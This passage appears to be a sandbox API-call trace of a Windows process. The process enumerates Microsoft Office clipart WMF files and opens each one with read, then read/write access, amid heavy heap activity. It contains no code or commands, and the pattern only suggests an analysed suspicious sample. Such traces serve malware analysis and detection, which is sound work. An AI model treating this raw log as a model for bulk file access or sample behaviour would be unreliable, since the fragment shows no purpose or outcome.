hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.601] AreFileApisANSI () returned 1 [0102.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0102.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.602] AreFileApisANSI () returned 1 [0102.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0102.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 69 [0102.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.602] GetFileType (hFile=0x33c) returned 0x1 [0102.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.602] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.602] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.602] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.603] CloseHandle (hObject=0x33c) returned 1 [0102.603] AreFileApisANSI () returned 1 [0102.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0102.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 69 [0102.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.603] GetFileType (hFile=0x33c) returned 0x1 [0102.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.603] CloseHandle (hObject=0x33c) returned 1 [0102.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.604] AreFileApisANSI () returned 1 [0102.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 69 [0102.604] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2458)) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0102.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.604] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00242_.WMF", cAlternateFileName="")) returned 1 [0102.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0102.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.605] AreFileApisANSI () returned 1 [0102.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.605] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.605] AreFileApisANSI () returned 1 [0102.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 69 [0102.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.605] GetFileType (hFile=0x33c) returned 0x1 [0102.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.606] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.606] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.606] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.606] CloseHandle (hObject=0x33c) returned 1 [0102.606] AreFileApisANSI () returned 1 [0102.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 69 [0102.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.607] GetFileType (hFile=0x33c) returned 0x1 [0102.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.607] CloseHandle (hObject=0x33c) returned 1 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.607] AreFileApisANSI () returned 1 [0102.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0102.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 69 [0102.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfb8)) returned 1 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x386c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00247_.WMF", cAlternateFileName="")) returned 1 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] AreFileApisANSI () returned 1 [0102.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.609] AreFileApisANSI () returned 1 [0102.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 69 [0102.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.609] GetFileType (hFile=0x33c) returned 0x1 [0102.609] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.609] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.609] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.610] CloseHandle (hObject=0x33c) returned 1 [0102.610] AreFileApisANSI () returned 1 [0102.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 69 [0102.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.610] GetFileType (hFile=0x33c) returned 0x1 [0102.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.610] CloseHandle (hObject=0x33c) returned 1 [0102.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.611] HeapFree 